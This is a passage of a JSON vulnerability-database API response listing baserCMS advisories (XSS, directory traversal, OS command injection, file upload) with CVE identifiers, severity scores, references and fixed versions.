"affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0" } ], "aliases": [ "CVE-2023-43647", "GHSA-ggj4-78rm-6xgv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pd8c-9d7z-zkhg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56069?format=api", "vulnerability_id": "VCID-sqr4-v889-tff8", "summary": "baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature\nXSS vulnerability in Blog posts and Contents list Feature to baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46994", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01179", "scoring_system": "epss", "scoring_elements": "0.79112", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-46994" }, { "reference_url": "https://basercms.net/security/JVN_00876083", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/" } ], "url": "https://basercms.net/security/JVN_00876083" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46994", "reference_id": "CVE-2024-46994", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46994" }, { "reference_url": "https://github.com/advisories/GHSA-wrjc-fmfq-w3jr", "reference_id": "GHSA-wrjc-fmfq-w3jr", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-wrjc-fmfq-w3jr" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr", "reference_id": "GHSA-wrjc-fmfq-w3jr", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/83045?format=api", "purl": "pkg:composer/baserproject/basercms@5.1.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2" } ], "aliases": [ "CVE-2024-46994", "GHSA-wrjc-fmfq-w3jr" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46308?format=api", "vulnerability_id": "VCID-u16w-rbuk-ybfs", "summary": "baserCMS Directory Traversal vulnerability in Form submission data management Feature\nThere is a Directory Traversal Vulnerability in Form submission data management Feature to baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\n### Target\nbaserCMS 4.7.8 and earlier versions\n\n### Vulnerability\nThere is a possibility that information on the server may be obtained by a user who is logged in to the management screen.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_45547161\n\n### Credits\nShiga Takuma@BroadBand Security, Inc", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43648", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00289", "scoring_system": "epss", "scoring_elements": "0.52624", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43648" }, { "reference_url": "https://basercms.net/security/JVN_81174674", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/" } ], "url": "https://basercms.net/security/JVN_81174674" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/" } ], "url": "https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43648", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43648" }, { "reference_url": "https://github.com/advisories/GHSA-hmqj-gv2m-hq55", "reference_id": "GHSA-hmqj-gv2m-hq55", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-hmqj-gv2m-hq55" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55", "reference_id": "GHSA-hmqj-gv2m-hq55", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/67525?format=api", "purl": "pkg:composer/baserproject/basercms@4.8.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/67580?format=api", "purl": "pkg:composer/baserproject/basercms@5.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0" } ], "aliases": [ "CVE-2023-43648", "GHSA-hmqj-gv2m-hq55" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u16w-rbuk-ybfs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47096?format=api", "vulnerability_id": "VCID-uedz-j2vn-cbea", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\nbaserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-51450", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00755", "scoring_system": "epss", "scoring_elements": "0.73646", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-51450" }, { "reference_url": "https://basercms.net/security/JVN_09767360", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/" } ], "url": "https://basercms.net/security/JVN_09767360" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/" } ], "url": "https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51450", "reference_id": "CVE-2023-51450", "reference_type": "", "scores": [ { "value": "5.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51450" }, { "reference_url": "https://github.com/advisories/GHSA-77fc-4cv5-hmfr", "reference_id": "GHSA-77fc-4cv5-hmfr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-77fc-4cv5-hmfr" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr", "reference_id": "GHSA-77fc-4cv5-hmfr", "reference_type": "", "scores": [ { "value": "5.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69105?format=api", "purl": "pkg:composer/baserproject/basercms@5.0.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9" } ], "aliases": [ "CVE-2023-51450", "GHSA-77fc-4cv5-hmfr" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-uedz-j2vn-cbea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90946?format=api", "vulnerability_id": "VCID-y2sz-c6vb-pkdp", "summary": "baserCMS Update Functionality Vulnerable to OS Command Injection\n### Summary\nThe latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.\nDue to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.\n\n### Details\nPlease refer to the attached materials.\n[OSコマンドインジェクション(baserCMSのアップデート機能).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)\n\n\n\n### Impact\nAn authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30877", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19955", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30877" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30877", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30877" }, { "reference_url": "https://github.com/advisories/GHSA-m9g7-rgfc-jcm7", "reference_id": "GHSA-m9g7-rgfc-jcm7", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-m9g7-rgfc-jcm7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-30877", "GHSA-m9g7-rgfc-jcm7" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91645?format=api", "vulnerability_id": "VCID-zqd4-rdem-jfgk", "summary": "baserCMS has a cross-site scripting vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.1 and earlier versions\n\n### Vulnerability\n\nMalicious Javascript may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_20837860\n\n### Credits\n\nGai Tanaka@Mitsui Bussan Secure Directions, Inc.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30879", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01615", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30879" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30879", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30879" }, { "reference_url": "https://github.com/advisories/GHSA-jmq3-x8q7-j9qm", "reference_id": "GHSA-jmq3-x8q7-j9qm", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-jmq3-x8q7-j9qm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-30879", "GHSA-jmq3-x8q7-j9qm" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44709?format=api", "vulnerability_id": "VCID-zsgc-fnen-b7a6", "summary": "Unrestricted Upload of File with Dangerous Type\nbaserCMS is a Content Management system. Prior to version 4.7.5, any file may be uploaded on the management system of baserCMS. Version 4.7.5 contains a patch.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-25655", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00561", "scoring_system": "epss", "scoring_elements": "0.68669", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00561", "scoring_system": "epss", "scoring_elements": "0.6871", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-25655" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/" } ], "url": "https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100" }, { "reference_url": "https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/" } ], "url": "https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25655", "reference_id": "CVE-2023-25655", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25655" }, { "reference_url": "https://github.com/advisories/GHSA-mfvg-qwcw-qvc8", "reference_id": "GHSA-mfvg-qwcw-qvc8", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-mfvg-qwcw-qvc8" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8", "reference_id": "GHSA-mfvg-qwcw-qvc8", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { 